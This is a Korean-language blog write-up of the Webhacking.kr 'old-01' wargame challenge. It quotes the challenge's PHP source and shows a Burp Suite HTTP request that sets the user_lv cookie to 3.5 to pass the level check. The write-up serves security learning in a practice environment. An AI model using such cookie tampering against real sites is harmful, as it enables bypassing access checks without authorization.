문제 서버에 접속하면 위와 같은 페이지가 출력된다. veiw-source를 클릭해서 소스를 보면 아래와 같다.
<?php
include "../../config.php";
if($_GET['view-source'] == 1){ view_source(); }
if(!$_COOKIE['user_lv']){
SetCookie("user_lv","1",time()+86400*30,"/challenge/web-01/");
echo("<meta http-equiv=refresh content=0>");
}
?>
<html>
<head>
<title>Challenge 1</title>
</head>
<body bgcolor=black>
<center>
<br><br><br><br><br>
<font color=white>
---------------------<br>
<?php
if(!is_numeric($_COOKIE['user_lv'])) $_COOKIE['user_lv']=1;
if($_COOKIE['user_lv']>=4) $_COOKIE['user_lv']=1;
if($_COOKIE['user_lv']>3) solve(1);
echo "<br>level : {$_COOKIE['user_lv']}";
?>
<br>
<a href=./?view-source=1>view-source</a>
</body>
</html>
코드를 살펴보면 쿠키에 user_lv 값이 3보다 크고 4보다 작으면 solve(1)함수가 실행된다. 따라서 아래와 같이 버프스위트로 user_lv값만 3.5로 변경해서 패킷을 보내면 pwnable하다.
GET /challenge/web-01/ HTTP/1.1
Host: webhacking.kr
Cookie: user_lv=3.5; PHPSESSID=rkhr2fcvpf4u1hsodiqvegobql
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="91", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://webhacking.kr/old.php
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
'웹 해킹 > Webhacking.kr' 카테고리의 다른 글
| [Webhacking.kr] old-06 (0) | 2021.08.27 |
|---|---|
| [Webhacking.kr] old-05 (0) | 2021.08.26 |
| [Webhacking.kr] old-04 (0) | 2021.08.26 |
| [Webhacking.kr] old-03 (0) | 2021.08.26 |
| [Webhacking.kr] old-02 (0) | 2021.08.25 |
댓글